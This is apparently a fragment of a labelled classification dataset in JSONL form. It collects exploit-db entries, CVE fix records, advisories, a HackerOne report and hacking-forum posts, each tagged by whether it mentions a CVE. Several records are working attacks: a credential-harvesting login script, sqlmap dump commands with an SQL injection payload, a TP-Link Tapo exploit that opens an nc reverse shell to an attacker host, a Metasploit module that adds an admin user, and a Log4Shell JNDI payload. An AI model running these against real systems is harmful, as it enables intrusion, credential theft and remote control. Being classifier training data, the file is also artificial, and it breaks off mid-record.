response.status_code == 200:\n print(\"[*] Successful request to URL:\", url + \"\\n\")\n content = response.text\n users_names = userName_parser(content,\"\",\" \")\n sha1_hashes = re.findall(r\"[a-fA-F\\d]{40}\", content)\n\n print(\"SHA1 Hashes found:\\n\")\n\n loops = 0\n while loops < len(sha1_hashes):\n print(\"Username: \" + str(users_names[loops]) + \"\\n\" + \"SHA1 Hash: \" + sha1_hashes[loops] + \"\\n\")\n\n\n for sha1_hash in sha1_hashes:\n if sha1_hash in hashes:\n print(\"Match:\", sha1_hash, hashes[sha1_hash])\n print(\"\\nTesting Credentials via API.\\n\\n\")\n payload = (sys.argv[1] + \"/System.xml?\" + \"action=login&\" + \"user=\" + users_names[loops] + \"&password=\" + hashes[sha1_hash])\n\n response_login = requests.get(payload, allow_redirects=False, verify=False)\n headers = response_login.headers\n if \"sessionID\" in headers:\n print(\"Username & Password for \" + str(users_names[loops]) + \" is correct.\\n\\nThe SessionID Token / Cookie is:\\n\")\n print(headers[\"sessionID\"])\n else:\n print(\"Unable to sign in.\")\n loops = loops + 1\n else:\n print(\"Host is not vulnerable:\", response.status_code)\n\n\n\n\n\n\n[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]\n Ken Pyle\n M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+\n Main: 267-540-3337\n Direct: 484-498-8340\n Email: kp@cybir.com\n Website: www.cybir.com", "source": "exploitdb", "timestamp": "2023-04-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "882ce4afa288ee9e0cf9", "text": "Thank you everybody, this topic helped a lot. Another hint, there are 3 fields with = that could be used on the injection. Make sure to test all of them.", "source": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bfc560d9dab506149e99", "text": "Induced error (network denial) in sudo apt update/upgrade\n\nHey guys. I’ve just realized something, which could be of interest for the community and the developers. If I install, and then configure my ParrotSec instance in Latin America. It works perfectly. BUT, if I sudo apt get update and then sudo apt upgrade I obtain a warning related with a modification on the /etc/apt/sources.list (repository file). Whatever I choose to do, I have the same issue over and over again: Basically I loose my capacity to use ethernet. Just because I was curious. I reinstalled my version of ParrotSec through an USB Image that I always have with me. I can guarantee that the version has been the same through the time. But now, after I installed it in Europe IT WORKS! I’m not providing an explanation to this phenomena, but I’m just sharing with you guys the facts.", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "db7cf55bcaa1109a934f", "text": "If anyone has any issues try this, as you want what is listening on ipv4 only (0.0.0.0) which forces the daemon to listen on ipv4 only. netstat -luntp | grep “0.0.0.0” | grep -v “127.0.0” | grep “LISTEN” | wc -l", "source": "hackthebox", "timestamp": "2022-01-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4ce1cc9dfed337d3d996", "text": "Pdf-jpgs\n\nHi guys. Can everyone help me: Two images that look completely ordinary are pasted in the PDF file, and it is highly unlikely that these files are normal. find a flag in PDF file. flag format:flag{[A-Za-z_]} File: https://ctf.laocert.la/download?file_key=2ae22faf6141dcd80543c3b183a5c6b453294ad49726507f2c8bc20919ed4ebf&team_key=dd89c8b4f94a963a02b496fec932dbb83ecc66561284a4906fd9c8fdc3fcaf46", "source": "hackthebox", "timestamp": "2022-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "94876a7b1151963c936b", "text": "can someone tell me what is going on here,… I am new here and I want to learn ACH and buying of logs", "source": "hackthebox", "timestamp": "2023-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1930a63481f92b13d511", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-03-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7e13bb5459b74a837ce4", "text": "You have to check the denied characters. In your case the %7c (|) character is blacklisted, and you mustn’t use it, try with another type of injection", "source": "hackthebox", "timestamp": "2022-08-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "162a890c46bf8ac45839", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-8242, CVE-2018-8287, CVE-2018-8288, CVE-2018-8291, CVE-2018-8296, CVE-2018-8298.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d02ce4b2e4e369598679", "text": "Intern Record System v1.0 - SQL Injection (Unauthenticated)\n\n# Exploit Title: Intern Record System v1.0 - SQL Injection (Unauthenticated)\n# Date: 2022-06-09\n# Exploit Author: Hamdi Sevben\n# Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/\n# Software Link: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip\n# Version: 1.0\n# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53\n# CVE: CVE-2022-40347\n# References:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40347\nhttps://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated\n\n------------------------------------------------------------------------------------\n\n1. Description:\n----------------------\n\nIntern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php\nExploiting this issue could allow an attacker to compromise the application, access or modify data,\nor exploit latest vulnerabilities in the underlying database.\n\n\n2. Proof of Concept:\n----------------------\n\nIn sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.\nThen run SQLmap to extract the data from the database:\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"deptType\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"email\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=test&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"name\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=&deptType=3&name=test\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"phone\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=test&email=&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\n\n3. Example payload:\n----------------------\n\n-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROU", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f77fefab6cb3f631d2cc", "text": "I’m stuck on the last one. Any help? I’ve already tried playing with the filters but i dont come up with anything new.", "source": "hackthebox", "timestamp": "2023-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "32d70fd1c63dbd0f1b7e", "text": "CVE: CVE-2021-46463\n\n[{'lang': 'en', 'value': 'njs through 0.7.1, used in NGINX, was discovered to contain a control flow hijack caused by a Type Confusion vulnerability in njs_promise_perform_then().'}]\n\nFix commit: Fixed type confusion bug while resolving promises.\n\nPreviously, the internal function njs_promise_perform_then() which\nimplements PerformPromiseThen() expects its first argument to always be\na promise instance. This assertion might be invalid because the\nfunctions corresponding to Promise.prototype.then() and\nPromise.resolve() incorrectly verified their arguments.\n\nSpecifically, the functions recognized their first argument as promise\nif it was an object which was an Promise or had Promise object in its\nprototype chain. The later condition is not correct because internal\nslots are not inherited according to the spec.\n\nThis closes #447 issue in Github.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4621e5c8bf723b5b7389", "text": "j0hnnyhax, the legend. LOL! en.wikipedia.org Johnny Long Johnny Long, otherwise known as \"j0hnny\" or \"j0hnnyhax\", is a computer security expert, author, and public speaker in the United States. Long is well known for his background in Google hacking, a process by which vulnerable servers on the Internet can be identified through specially constructed Google searches. He has gained fame as a prolific author and editor of numerous computer security books. Early in his career, in 1996, Long joined Computer Sciences Corporation and formed the corporation...", "source": "parrotsec", "timestamp": "2022-09-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7cdc6daa583f63fffe62", "text": "Instead of resorting to unethical and illegal activities, it is recommended to explore other options such as contacting the email service provider for assistance or attempting to reset the password using the account recovery options. It is always important to respect others' privacy and security, and refrain from engaging in any activities that may harm others or violate the law.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c623bf7cf847f6c35a8f", "text": "Issue while installing virtual box\n\nHi everyone, I m working under Blach Arch distribution and facing an issue during the server start. Actually, I executed the bellow commands : sudo pacman -S virtualbox virtualbox-guest-iso sudo gpasswd -a $USER vboxusers sudo modprobe vboxdrv yay -Syy yay -S virtualbox-ext-oracle sudo systemctl enable vboxweb.service But I get an error after executing the bellow command : sudo systemctl start vboxweb.service Error: Job for vboxweb.service failed because the control process exited with error code. See “systemctl status vboxweb.service” and “journalctl -xeu vboxweb.service” for details. Could you please tell me if it’s the right way to do? if yes, could you please help on this faced issue? Many thanks for your help. Regards,", "source": "hackersploit", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1b799567f1f5a6d1ec4a", "text": "Liferay Portal and Liferay DXP Vulnerable to XSS via the OAuth2ProviderApplicationRedirect Class\n\n[Severity: CRITICAL]\n\nMultiple reflected cross-site scripting (XSS) vulnerabilities in the Plugin for OAuth 2.0 module's OAuth2ProviderApplicationRedirect class before 4.0.51 from Liferay Portal (7.4.3.41 through 7.4.3.89), and Liferay DXP 7.4 update 41 through update 89 allow remote attackers to inject arbitrary web script or HTML via the (1) code, or (2) error parameter. This issue is caused by an incomplete fix in CVE-2023-33941.", "source": "github_advisory", "timestamp": "2023-10-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3e85a96bc32068545826", "text": "TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)\n\n# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)\n# Date: 02/11/2022\n# Exploit Author: hacefresko\n# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/\n# Version: 1.1.15 and below\n# Tested on: 1.1.11, 1.1.14 and 1.1.15\n# CVE : CVE-2021-4045\n\n# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce\n\nimport requests, urllib3, sys, threading, os\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nPORT = 1337\nREVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'\nNC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)\n\nif len(sys.argv) < 3:\n print(\"Usage: python3 pwnTapo.py \")\n exit()\n\nvictim = sys.argv[1]\nattacker = sys.argv[2]\n\nprint(\"[+] Listening on %d\" % PORT)\nt = threading.Thread(target=os.system, args=(NC_COMMAND,))\nt.start()\n\nprint(\"[+] Serving payload to %s\\n\" % victim)\nurl = \"https://\" + victim + \":443/\"\njson = {\"method\": \"setLanguage\", \"params\": {\"payload\": \"';\" + REVERSE_SHELL % (attacker, PORT) + \";'\"}}\nrequests.post(url, json=json, verify=False)", "source": "exploitdb", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d90c8333d75c6692e7b3", "text": "CVE: CVE-2022-0579\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in Packagist snipe/snipe-it prior to 5.3.9.'}]\n\nFix commit: Merge pull request #10665 from snipe/fixes/adds_gate_to_supplier_view\n\nAdds gate to supplier", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a86a2e49ae9baba7cedc", "text": "[Command Injection - Generic] LOGJ4 VUlnerability [HtUS]\n\n**Description:**\nHi team,\n\nlog4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable\n\n**Impact**\n\nRCE\n\n**System Host(s)**\n\n██████\n\n**Affected Product(s) and Version(s)**\n\n**CVE Numbers**\n\nCVE-2021-44228\n\n**Steps to Reproduce**\n\n1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n2. paste the poc code on parameter\n3. Then burp collaborator received reverse ping back\nPhotos below\n\n**POC CODE**\n${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n\n**Suggested Mitigation/Remediation Actions**\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Impact\n\nSuccessful attack leads Arbitary Code Execution on the application", "source": "hackerone", "timestamp": "2022-11-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "85b72eb6109303c1c16b", "text": "CVE: CVE-2022-2874\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0224.'}]\n\nFix commit: patch 9.0.0224: Using NULL pointer when skipping compiled code\n\nProblem: Using NULL pointer when skipping compiled code.\nSolution: Check for skipping.", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c805f24dbe6313d55fe9", "text": "thank you to everyone who contributed in providing tips you all were very helpful. my piece of advice would try and get an error in your burp requests that gives you an idea of what commands are being ran in what syntax while messing around with the different feilds of injection. once youve got the syntax then all you need to do is bypass filters and find the proper payload.", "source": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5754d57a7dde5e34a689", "text": "I managed to solve this skill assesement, but I don’t understand why Like, I get the server is not blacklisting the “.”, but why the “” which basically returns a “.” don’t give the same result? I tested both commands on my terminal, and both command produces the same final result (&cat /flag.txt) Can someone clarify to me why? Thanks!", "source": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5ca1cb2bb3a767888dd3", "text": "SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains malware)\n\n846×558 125 KB Video: Download: HACKING CRACKING SECURITY SEO MARKETING MMO SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains... https://vimeo.com/746983244 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackersploit", "timestamp": "2022-09-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7f1d46e90f21dacf9593", "text": "CVE: CVE-2021-20257\n\n[{'lang': 'en', 'value': 'An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.'}]\n\nFix commit: e1000: fail early for evil descriptor\n\nDuring procss_tx_desc(), driver can try to chain data descriptor with\nlegacy descriptor, when will lead underflow for the following\ncalculation in process_tx_desc() for bytes:\n\n if (tp->size + bytes > msh)\n bytes = msh - tp->size;\n\nThis will lead a infinite loop. So check and fail early if tp->size if\ngreater or equal to msh.\n\nReported-by: Alexander Bulekov \nReported-by: Cheolwoo Myung \nReported-by: Ruhr-University Bochum \nCc: Prasad J Pandit \nCc: qemu-stable@nongnu.org\nSigned-off-by: Jason Wang ", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b2b3ab31adfe61d6db5b", "text": "Bundled libwebp in pywebp vulnerable\n\n[Severity: HIGH]\n\n### Impact\npywebp versions before v0.3.0 bundled libwebp binaries in wheels that are vulnerable to CVE-2023-4863. The vulnerability was a heap buffer overflow which allowed a remote attacker to perform an out of bounds memory write.\n\n### Patches\nThe problem has been patched upstream in libwebp 1.3.2.\npywebp was updated to bundle a patched version of libwebp in v0.3.0.\n\n### Workarounds\nNo known workarounds without upgrading.\n\n### References\n- https://www.rezilion.com/blog/rezilion-researchers-uncover-new-details-on-severity-of-google-chrome-zero-day-vulnerability-cve-2023-4863/\n- https://nvd.nist.gov/vuln/detail/CVE-2023-4863\n", "source": "github_advisory", "timestamp": "2023-10-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "de3fa82147bdd939d11a", "text": "never mind, I’ve found it. I think I mistyped on my first attempt", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2a22b51c9bb109e4d13b", "text": ".NET Denial of Service vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-29331: .NET Denial of Service vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET when processing X.509 certificates that may result in Denial of Service. \n\nDetails: [KB5025823 ](https://support.microsoft.com/kb/5025823)\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/257\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.5 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.16 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 7.0.0, < 7.0.1 | 7.0.3\n[System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 7.0.0, < 7.0.1 | 7.0.2\n[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, < 7.0.5 | 7.0.7\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 6.0.0, < 6.0.4 | 6.0.6\n[System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 6.0.0, < 6.0.2 | 6.0.3\n[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 6.0.0, < 6.0.16 | 6.0.18\n[Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Micros", "source": "github_advisory", "timestamp": "2023-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "00ce72bf58d33357b379", "text": "Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',\n 'Description' => %q(\n This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.\n\t\tThe app.js is publicly available which acts as the backend of the application.\n By exposing a default value for the \"Authorization\" HTTP header,\n it is possible to make unauthenticated requests to some areas of the application.\n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\n A new admin user can be added to the database with this header obtained in the source code.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22831' ],\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # for Origin and Referer headers\n\n def app_path\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /baseURL/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\n print_status(\"baseURL: #{base_url}\")\n return base_url\n else\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\n end\n end\n\n def add_user\n token = auth_bypass\n newuser = Rex::Text.rand_text_alpha_lower(8)\n id = Rex::Text.rand_text_numeric(4)\n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullanıcı\"}'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'ctype' => 'application/json',\n 'uri' => normalize_uri(target_uri.path, app_path, 'users'),\n 'headers' =>\n {\n 'Authorization' => token\n },\n 'data' => json_data\n })\n\n if res && res.code == 200 && res.body =~ /localhost/\n print_good(\"The sysAdmin authorized user has been successfully added.\")\n print_status(\"Username: #{newuser}\")\n print_status(\"Password: 1111111111\")\n else\n fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')\n end\n end\n\n def auth_bypass\n\n res = send_request_cgi({\n # default.a.default", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8cf41990f1bd5476b432", "text": "Path Traversal in Spring-integration-zip\n\n[Severity: MEDIUM]\n\nAddresses partial fix in CVE-2018-1263. Spring-integration-zip, versions prior to 1.0.4, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a774ed10978bfeea9673", "text": "CVE: CVE-2022-31092\n\n[{'lang': 'en', 'value': \"Pimcore is an Open Source Data & Experience Management Platform. Pimcore offers developers listing classes to make querying data easier. This listing classes also allow to order or group the results based on one or more columns which should be quoted by default. The actual issue is that quoting is not done properly in both cases, so there's the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and so relies on the auto-quoting being done by the listing classes. This issue has been resolved in version 10.4.4. Users are advised to upgrade or to apple the patch manually. There are no known workarounds for this issue.\"}]\n\nFix commit: [Security] SQL Injection in Data Hub GraphQL (#12444)\n\n* [Security] SQL Injection in Data Hub GraphQL (AbstractListing)\r\n\r\n* Update lib/Model/Listing/AbstractListing.php\r\n\r\nCo-authored-by: Jacob Dreesen \r\n\r\n* Update lib/Model/Listing/AbstractListing.php\r\n\r\nCo-authored-by: mcop1 <89011527+mcop1@users.noreply.github.com>\r\n\r\nCo-authored-by: Jacob Dreesen \r\nCo-authored-by: Bernhard Rusch ", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "430d2a8cb8c8f18b928a", "text": "CVE: CVE-2022-23651\n\n[{'lang': 'en', 'value': 'b2-sdk-python is a python library to access cloud storage provided by backblaze. Linux and Mac releases of the SDK version 1.14.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. SDK users of the SqliteAccountInfo format are vulnerable while users of the InMemoryAccountInfo format are safe. The SqliteAccountInfo saves API keys (and bucket name-to-id mapping) in a local database file ($XDG_CONFIG_HOME/b2/account_info, ~/.b2_account_info or a user-defined path). When first created, the file is world readable and is (typically a few milliseconds) later altered to be private to the user. If the directory containing the file is readable by a local attacker then during the brief period between file creation and permission modification, a local attacker can race to open the file and maintain a handle to it. This allows the local attacker to read the contents after the file after the sensitive information has been saved to it. Consumers of this SDK who rely on it to save data using SqliteAccountInfo class should upgrade to the 